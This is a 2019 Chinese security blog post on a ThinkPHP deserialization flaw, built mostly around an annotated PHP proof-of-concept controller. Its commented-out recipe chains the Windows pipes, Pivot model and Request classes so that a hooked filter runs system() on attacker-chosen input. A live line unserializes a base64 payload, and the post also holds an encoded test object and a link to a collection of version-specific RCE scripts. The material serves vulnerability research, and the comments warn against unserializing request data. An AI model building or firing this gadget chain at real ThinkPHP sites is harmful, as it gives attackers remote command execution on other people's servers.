
ThinkPHP 反序列化漏洞

wpadmin~August 2, 2019 /InfoSec

ThinkPHP 反序列化漏洞

正文

参考（本文利用链的来源，riskivy 对 ThinkPHP 中反序列化利用链的挖掘分析）：https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/

ThinkPHP RCE PoC 汇总（含各版本利用脚本）：https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

<?php

namespace app\index\controller;

use think\process\pipes\Windows;
use think\Request;
use think\Model\Pivot;

/**
 * Scratch controller used to reproduce the ThinkPHP unserialize() gadget
 * chain described in the riskivy write-up linked above.
 *
 * The imported classes (think\process\pipes\Windows, think\Request,
 * think\Model\Pivot) are the gadgets the chain is built from; check that the
 * exact ThinkPHP release under test still ships them with the same
 * behaviour, since the chain depends on framework internals.
 */
class Index {

    /**
     * Proof-of-concept entry point: base64-decodes a pre-built payload and
     * hands it to unserialize().
     *
     * Only the two lines around $json are live. Everything commented out is
     * the author's record of how the payload was constructed, plus earlier
     * experiments kept for reference. The payload literal itself was redacted
     * from this listing, so the method cannot be run exactly as shown.
     *
     * Security note: unserialize() on data that originates outside the
     * process is the bug being demonstrated here. Application code must never
     * accept a serialized string from a request (the vulnerable shape is
     * unserialize(base64_decode($_GET['...'])) or similar); decode untrusted
     * input with json_decode() and validate its shape instead.
     *
     * @return null  Nothing is returned; any effect comes from the object
     *               graph created by unserialize() and its destructors.
     */
    public function index() {

        // --- Payload construction (commented out; kept as the reference recipe) ---
        // Outer gadget: a Windows pipes object whose private `files` array is
        // the attacker-controlled field (populated via setFiles() below). The
        // constructor arguments are not explained on this page.
//        $ww = new Windows(1,null);
        // A concrete Model (Pivot) that will be placed into `files`. Per the
        // write-up the chain relies on this object being string-converted when
        // the Windows destructor inspects its file list -- TODO confirm against
        // think\process\pipes\Windows::__destruct of the target version.
//        $file=new Pivot();
        // The Request carries the sink: a hook named "append" pointing at
        // Request::isAjax, a param() call, and filter("system"), which presumably
        // stores "system" as the Request's filter callable -- verify against
        // Request::filter()/input()/filterValue() of the target version.
//        $rr=new Request();
//        $rr->hook(["append"=>array($rr,"isAjax")]);
//        $rr->param("calc");
//        $rr->filter("system");
        // The Request is stored as model attribute "exp". The intent is that
        // the Model's array/JSON conversion reaches this attribute, dispatches
        // the hooked "append" method, and the Request's input filtering then
        // applies system() to attacker-chosen data ("calc"). This is the part
        // that is most version-specific; do not assume it without reading the
        // framework source.
//        $file->setAttr("exp",$rr);
//        $ww->setFiles([0=>$file]);
//        $data= serialize($ww);
//        return base64_encode($data);

        // --- Live code: deliver the pre-built payload ---
        // $json holds the base64-encoded serialized object graph produced by
        // the recipe above; the literal was redacted from this listing.
        $json="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";
        // Sink. Here the payload is a constant, so the line is only dangerous
        // because the payload is hostile by design; in a real application the
        // equivalent defect is unserialize() on request-supplied data.
        unserialize(base64_decode($json));
//return(base64_decode($json));


        // --- Earlier experiments (commented out) ---
        // Same recipe, but deserialized in-process instead of returned.
//        $ww->setFiles([0=>$file]);
//        $data= serialize($ww);
//        unserialize($data);

        // Scratch check of nested call_user_func_array dispatch; unrelated to
        // the gadget chain. Note the inner call targets $this->hello().
      //  call_user_func_array("call_user_func_array",array($this,"hello"));
//        $ww = new Windows(1, null);
//
//
//
        // String-converting a bare Pivot exercises the Model's string
        // conversion on its own (presumably Model::__toString -> JSON of its
        // attributes -- confirm).
//        $kk = new Pivot();
//        return $kk."";
//        //$data= serialize($ww);
        // $data below decodes to a serialized think\process\pipes\Windows with
        // private `files` => [0 => "D:\1.txt"], `fileHandles` => [],
        // `readBytes` => [1 => 0, 2 => 0], `disableOutput` => true,
        // `pipes` => [], inputBuffer/input => null, Pipes::`blocked` => true.
        // It was used to confirm that the destructor's file handling fires on
        // an unserialized object (a plain path, no Model) before the
        // Model-based chain was attempted.
//        $data = "TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjo4OntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtzOjg6IkQ6XDEudHh0Ijt9czo0MDoiAHRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cwBmaWxlSGFuZGxlcyI7YTowOnt9czozODoiAHRoaW5rXHByb2Nlc3NccGlwZXNcV2luZG93cwByZWFkQnl0ZXMiO2E6Mjp7aToxO2k6MDtpOjI7aTowO31zOjQyOiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGRpc2FibGVPdXRwdXQiO2I6MTtzOjU6InBpcGVzIjthOjA6e31zOjE0OiIAKgBpbnB1dEJ1ZmZlciI7TjtzOjg6IgAqAGlucHV0IjtOO3M6MzQ6IgB0aGlua1xwcm9jZXNzXHBpcGVzXFBpcGVzAGJsb2NrZWQiO2I6MTt9";
//        $aa = base64_decode($data);
//        unserialize($aa);

        // Minimal check that Request::hook() lets an arbitrary method name
        // ("dsds") be dispatched to a registered callable (presumably through
        // Request::__call); this is the dispatch step the chain depends on.
//        $tt = new Request();
//        $method=array("dsds"=>array($tt,"isAjax"));
//        $tt->hook($method);
//        $tt->dsds(1);
        //return $aa;
    }

    /**
     * Trivial greeter. Referenced only by the call_user_func_array scratch
     * line in index(); otherwise unused by the PoC.
     *
     * @param string $name  Name to greet; defaults to 'ThinkPHP5'.
     * @return string       'hello,' followed by $name.
     */
    public function hello($name = 'ThinkPHP5') {
        return 'hello,' . $name;
    }

}
